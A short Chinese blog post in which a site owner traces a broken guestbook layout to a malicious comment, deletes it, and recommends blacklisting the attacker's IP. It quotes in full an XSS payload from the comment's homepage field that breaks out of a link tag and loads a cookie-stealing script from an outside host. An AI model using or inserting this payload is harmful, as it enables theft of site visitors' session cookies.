今天浏览自己博客的时候无意中发现留言板有显示错误,如下图所示,可以看到右边的sidebar严重飘逸,并且在评论排行榜中有嵌套,文章主题也不在中间的位置。

F12开发者工具检查发现这里多出了很多不应该存在的结构

经过排查发现是其中一个评论导致的

其个人主页填写内容如下:

http://xxx.xxx.com/"></a>[script/src="https://xss.jnhrich.com/myjs/cookie.js"](script/src=%22https://xss.jnhrich.com/myjs/cookie.js%22)</script>[script/src=https://jackmi.jnhrich.com/jquery.js](script/src=https://jackmi.jnhrich.com/jquery.js)</script><a/href="#

经过分析应该是XSS注入,删除评论即可恢复。

攻击者的IP地址

建议给此IP加入黑名单:192.151.220.170

恢复后留言板的样子

最后修改:2024 年 02 月 19 日
© 允许规范转载
你的支持是我最大的动力